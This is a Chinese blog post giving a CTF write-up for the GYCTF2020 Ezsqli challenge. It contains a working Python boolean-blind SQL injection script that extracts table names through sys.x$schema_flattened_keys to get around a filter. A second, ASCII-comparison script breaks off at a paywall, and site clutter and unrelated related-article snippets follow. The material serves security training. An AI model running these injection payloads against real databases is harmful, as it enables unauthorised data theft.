一天一道ctf 第56天(ascii偏移盲注)

最新推荐文章于 2023-01-30 15:34:49 发布
原创 最新推荐文章于 2023-01-30 15:34:49 发布 · 628 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

[GYCTF2020]Ezsqli
先用二分法写一个脚本查一下表名,二分法快是快,但就是容易出错,用sleep延缓一下请求速度会好一些。or被过滤了所以informaiton.schema用不了,换成sys.x$schema_flattened_keys。

import requests
import time

url = "http://7630a861-14ab-4171-bfd2-dff39c2434b9.node4.buuoj.cn:81/"

flag = ""

payload = "1^(ascii(substr((select group_concat(table_name) from sys.x$schema_flattened_keys where table_schema=database()),{},1))>{})^1"

for i in range(1,100):
    min_value = 33
    max_value = 130
    mid = (min_value + max_value) // 2
    while (min_value < max_value):
        py = payload.format(i,mid)
        data = {
   
   "id": py}
        r = requests.post(url=url,data=data)
        if "Nu1L" in r.text:
            min_value = mid + 1
        else:
            max_value = mid
        mid = (min_value + max_value) // 2
    if (chr(mid) == " "):
        break
    flag += chr(mid)
    print(flag)
    time.sleep(0.5)

在这里插入图片描述
爆出来表名是f1ag_1s_h3r3_hhhhh,但是information.schema被过滤以后我们没法像之前一样继续爆列名。但我们知道了表名所以可以用ascii位偏移比较字符串来获取表的内容。(select 1,"{}")是因为flag在f1ag_1s_h3r3_hhhhh的第二列,可以从(select 1,1)(select 1,1,1)试出来。
同样加入sleep避免请求太快出错。

import requests
import time

url = 'http://67e56c51-dad1-4cd9-b205-91d106ccf701.node4.buuoj.cn:81/'
def add(flag):
    res = ''
    res += flag
    return res
flag = ''
for i in range(1,
最低0.47元/天 解锁文章
scrawman
关注
CTF-bugku-crypto-[7+1+0]-base64解码之后做偏移
m0_43405474的博客
03-03 1587
CTF-bugku-crypto-[7+1+0]-base64解码之后做偏移1.题目2.解题思路2.1 base64编码原理2.2 解题思路2.2.1 base64解码找规律2.2.2 破解思路3.解题脚本4. flag5.附EASCII码表 1.题目 提示信息:7+1+0?格式bugku{xxxxx} 密文:4nXna/V7t2LpdLI44mn0fQ== 要求:破解密文获得flag 2.解题思路 2.1 base64编码原理 用可打印的ASCII字符安全的转换任何二进制数据,将数据划分成三个字节一组,2
一天一道ctf 第47(二分法
scrawman的博客
07-29 436
[BSidesCF 2019]Kookie 看样子是要我们以admin登录,线索是cookie。只要抓包添加cookie:username=admin就行了(???) [WUSTCTF2020]颜值成绩查询
mysqlascii_[翻译]关于通过对8bit的ascii做右位移提高mysql效率
weixin_42593130的博客
01-27 176
该楼层疑似违规已被系统折叠隐藏此楼查看此楼通过这种方法我们只需要做8次select来确定一个键值的第一位或第n位下面将以查询mysql数据库当中user()的第一位为例:ps:第二位,第三位依次类推select substr(user(),2,1) mysql> select substr(user(),3,1)首先执行如下sql语句:mysql> select (ascii((su...
mysqlascii_关于sql语法
weixin_39884832的博客
02-28 331
如果页面没有显错数字,则用语法根据页面变化来判断数据内容获取数据长度:and (select top 1 len(列名) from 表名)>5and (select top 1 len(password) from admin)>16//错误and (select top 1 len(password) from admin)>15//正常获取指定位数的数据:and (sel...
[CTF]ACSII码
weixin_30414635的博客
12-11 627
[CTF]ACSII码 ----------转自百度百科 https://baike.baidu.com/item/ASCII/309296?fromtitle=ascii码&fromid=99077&fr=aladdin ASCII(American Standard Code for Information Interchange,美国...
JAVA 利用ASCII偏移(来自IDEA免费激活码游戏)
★【World Of Moshow 郑锴】★
03-15 1458
前言 最近idea风风光光激活码失效,于是官方推出了一系列游戏,DD大哥也给我们解析了很多 20/03/13 JetBrains 第二轮:再为免费全家桶续命三个月 20/03/12 免费获取 Jetbrain 全家桶使用兑换码的正确姿势! 兑换地址 https://www.jetbrains.com/promo/quest/ 解决方案 其中第一个任务,你需要到MPS-31816去获取一个线索。...
CTFHub | 布尔
尼泊罗河伯的博客
10-29 2120
根据网页显示内容输入1进行测试,此题可能存在 SQL 入。构造 payload 验证是否属于整数型入,确定此题为整数型入。使用工具 sqlmap 爆出数据库名,查看数据库名中的表发现一个可疑的表名为 flag 。查看 flag 表名的字段为 flag 。检查字段中的数据发现此题 flag 。
CTFSQL.py
11-25
CTF解题中有时会用到,这是一段SQL代码,运行于python37环境,多个字段信息提取的句子已释保存。
乐谱符号转码:CTF中MIDI事件的时值到ASCII转换.pdf
06-16
从隐写术到编码转换,从音频隐写到文件结构分析,CTF-Misc 教会你用技术的眼睛发现数据中的「彩蛋」。掌握 Stegsolve、CyberChef、Audacity 等工具,合法破解摩斯密码、二维码、LSB 隐写,在虚拟战场中提升网络安全...
JAVA 将字符串首字母转为大写 - 利用ASCII偏移
牛邪骁的博客
04-05 1903
str = str.substring(0, 1).toUpperCase() + str.substring(1); 看到一种效率更高的做法: public static String firstAlphabetToUpper(String str) { ...
ascll码偏移法实现文本文件加密解密
03-15
文本文档里面输入要加密的字符,程序实现加密后输出另一个文本文档
ctfAsciiCracker:对于ctf,我必须找到密码Len = 10,ascii值= 1000,第二个字母= S或83
03-03
ctfAsciiCracker:对于ctf,我必须找到密码Len = 10,ascii值= 1000,第二个字母= S或83
ascii码对照转换器,挺方便的
08-18
10进制数据与ascii码转换,非常的方便,不过也有点欠缺,就是未提供16进制转换。
对一个单词进行加密操作,在ASCII表中偏移量为3
王陈锋的博客
09-27 456
import java.util.*; public class zuoye9_27 { public static void main(String[] args) { String str; int i=0; char temp; Scanner reader=new Scanner(System.in); str=reader.nextLine(); char[] password=str.
CTF-杂项3:一段特殊的ascii密文
weixin_61842894的博客
11-16 1128
题目:解密ascll码-83,121,110,116,71,115,121,110,116,136,135,120,135,108,110,126,115,112,63,61,63,62,108,67,63,69,108,76,76,76,76,138,90,113,66,71,112,110,66,62,62,67,112,112,66,111,112,67,113,63,110,114,69,66,65,110,111,111,113,68,61,63,112,69,68,68,68。
SQL 入-
weixin_53711701的博客
01-30 2352
SQL 入-
SQL入3(
嚴 帅的博客
04-26 619
一、布尔型 布尔型是由于页面提交数据在与数据交互是完全没有在页面上出现回显数据,只会出现数据提交正确和错误俩种不同页面(报错型至少语法错误会回显错误在页面上)或者无法使用联合查询。 前三个步骤还是像前面联合入和报错入相同,需要判断出闭合方式。然后利用页面给我们呈现出的正确和错误的不同回馈来逐个猜测数据库中的内容。因为是通过猜测来判断数据库中的信息,显然这里就需要用到脚本来实现判断。...
ctf练习---ASCII码而已
ruins44的博客
05-12 2714
题目: \u5927\u5bb6\u597d\uff0c\u6211\u662f\u0040\u65e0\u6240\u4e0d\u80fd\u7684\u9b42\u5927\u4eba\uff01\u8bdd\u8bf4\u5fae\u535a\u7c89\u4e1d\u8fc7\u767e\u771f\u7684\u597d\u96be\u3002\u3002\u0077\u0063\u0
ctf似乎是个加密“倒计时最后一天
最新发布
09-13
CTF竞赛中常见的加密方式有多种,以下为你介绍几种不同加密方式对“倒计时最后一天”进行加密的示例。 ### RSA加密 RSA是一种经典的非对称加密算法。参考示例中的Python代码,在实际应用时需先生成大素数 `p` 和 `q`,计算模数 `n`、欧拉函数 `s`、公钥指数 `e` 和私钥指数 `d`,再使用公钥对明文进行加密。 ```python import gmpy2 from Crypto.Util.number import bytes_to_long # 示例中的 p、q、e p = 0xEB4360DF0E0C824D57AE20700BBF6C1BA8324A94DB7B3608DDA40DE07A59082F q = 0xA5B8BA7304F15C70BA82FF60F8A4A5F156ED04896EC94A7E99B96B4E11727A8F e = 0x10001 n = p * q s = (p - 1) * (q - 1) d = gmpy2.invert(e, s) # 将明文转换为整数 plaintext = "倒计时最后一天" m = bytes_to_long(plaintext.encode()) # 加密 c = pow(m, e, n) print("加密后的密文: ", c) ``` ### Base64编码 Base64是一种常见的编码方式,可将二进制数据编码为ASCII字符。Python中可使用`base64`库进行编码。 ```python import base64 plaintext = "倒计时最后一天" encoded_bytes = base64.b64encode(plaintext.encode()) encoded_text = encoded_bytes.decode() print("Base64编码后的结果: ", encoded_text) ``` ### 凯撒密码 凯撒密码是一种简单的替换加密方法,将字母按照一定的偏移量进行替换。 ```python def caesar_encrypt(text, shift): encrypted = "" for char in text: if char.isalpha(): ascii_offset = ord('A') if char.isupper() else ord('a') encrypted += chr((ord(char) - ascii_offset + shift) % 26 + ascii_offset) else: encrypted += char return encrypted plaintext = "倒计时最后一天" shift = 3 # 偏移量 encrypted_text = caesar_encrypt(plaintext, shift) print("凯撒密码加密后的结果: ", encrypted_text) ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值